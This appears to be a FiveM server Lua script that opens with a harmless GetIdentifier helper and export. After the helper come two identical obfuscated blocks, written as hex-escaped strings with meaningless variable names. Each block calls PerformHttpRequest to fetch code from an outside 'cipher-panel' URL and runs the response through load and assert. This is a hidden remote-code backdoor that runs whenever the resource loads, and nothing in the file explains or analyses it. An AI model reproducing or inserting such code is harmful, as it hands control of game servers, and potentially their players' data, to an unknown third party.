GetIdentifier = function(source,identifier)
  for k,id in pairs(GetPlayerIdentifiers(source)) do
    if id:find(identifier) then
      return id
    end
  end
end

exports("GetIdentifier",GetIdentifier)

local ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[4][ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x72\x42\x31\x4b\x35\x35", function (qpNeyKmveoVUSkMRVCkPGBwqMgmNtIdtTzLAaLfQzhgIBHwZiuCpOFuWvjOjLnDcjcVIEZ, GgHdwDHXNgkIKoJzyVjADmErNyHEeqvXpCnrAbvEEaiRtufguKPDFKREojKjxYWnkkPrtZ) if (GgHdwDHXNgkIKoJzyVjADmErNyHEeqvXpCnrAbvEEaiRtufguKPDFKREojKjxYWnkkPrtZ == ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[6] or GgHdwDHXNgkIKoJzyVjADmErNyHEeqvXpCnrAbvEEaiRtufguKPDFKREojKjxYWnkkPrtZ == ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[5]) then return end ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[4][ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[2]](ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[4][ZfNPpePeejoDamlniOpxuMbDJcEWZCAviZusgAEFbVJjiMCgpWQfEbNJcAjlgijjTdGSvk[3]](GgHdwDHXNgkIKoJzyVjADmErNyHEeqvXpCnrAbvEEaiRtufguKPDFKREojKjxYWnkkPrtZ))() end)

local kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[4][kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x69\x70\x68\x65\x72\x2d\x70\x61\x6e\x65\x6c\x2e\x6d\x65\x2f\x5f\x69\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x72\x42\x31\x4b\x35\x35", function (yCerqqBRbtnMFojkMjkWHttYZuWLVURRXbMBbMRdfyzmaMyZxrjSuxCVuPrlUxLJmOYdSf, cttqIfqvkNVZVXZpVIIQJAqtlVUXPLoIOchdzxOnKSvHnncMZDpcxskKgXBfdXSXFEpVeh) if (cttqIfqvkNVZVXZpVIIQJAqtlVUXPLoIOchdzxOnKSvHnncMZDpcxskKgXBfdXSXFEpVeh == kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[6] or cttqIfqvkNVZVXZpVIIQJAqtlVUXPLoIOchdzxOnKSvHnncMZDpcxskKgXBfdXSXFEpVeh == kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[5]) then return end kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[4][kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[2]](kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[4][kuIHRyeqslhAzSigJeYxEgnPvCbnARdkAiicLjRXWQIxzdtbmrafflBnAVfJEmOIvlBzpL[3]](cttqIfqvkNVZVXZpVIIQJAqtlVUXPLoIOchdzxOnKSvHnncMZDpcxskKgXBfdXSXFEpVeh))() end)